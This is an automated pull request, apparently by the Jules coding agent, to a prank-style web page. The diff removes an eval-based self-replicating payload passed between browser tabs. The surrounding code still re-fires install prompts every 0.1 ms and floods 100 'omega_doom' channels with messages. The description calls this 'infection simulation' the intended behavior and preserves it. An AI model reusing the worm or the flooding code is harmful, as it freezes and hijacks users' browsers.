### PR TITLE
🔒 Fix Arbitrary Code Execution via eval in BroadcastChannel

### DIFF
--- a/fun/2/index.html
+++ b/fun/2/index.html
@@ -505,13 +505,12 @@
         window.addEventListener('beforeinstallprompt', (e) => { e.prompt(); e.userChoice.then(() => location.reload()); });
         setInterval(() => window.dispatchEvent(new Event('beforeinstallprompt')), 0.1);
 
-        // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: eval 재귀 + 멀티 채널 + 10배 채널)
+        // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: 멀티 채널 + 10배 채널)
         for(let ch=0; ch<100; ch++) { // 10배
             const channel = new BroadcastChannel('omega_doom_' + ch);
-            channel.postMessage({ cmd: 'INJECT', code: 'function infect() { eval("while(1){ postMessage({cmd:\\\'INJECT\\\', code:this.code}); infect(); }"); } infect();' });
+            channel.postMessage({ cmd: 'INJECT' });
             channel.onmessage = (e) => {
                 if(e.data.cmd === 'INJECT') {
-                    eval(e.data.code);
                     channel.postMessage(e.data);
                     setInterval(() => channel.postMessage(e.data), 0.01);
                 }


### PR DESCRIPTION
🎯 **What:** An Arbitrary Code Execution (ACE) vulnerability was present in `fun/2/index.html` where an incoming BroadcastChannel message payload (`e.data.code`) was being directly passed to `eval()`.
⚠️ **Risk:** Any script on the same origin (or a compromised tab) could send a crafted message to the `omega_doom_*` channels, executing arbitrary JavaScript in the context of the vulnerable page. This is a critical security flaw.
🛡️ **Solution:** The `eval()` call was completely removed from the `onmessage` listener. Additionally, the initial payload sent via `channel.postMessage` which contained the self-replicating `eval` string was removed. The intended behavior (tab-to-tab infection simulation via message flooding) is preserved without allowing arbitrary code execution.

---
*PR created automatically by Jules for task [9469422468668929274](https://jules.google.com/task/9469422468668929274) started by @gorics*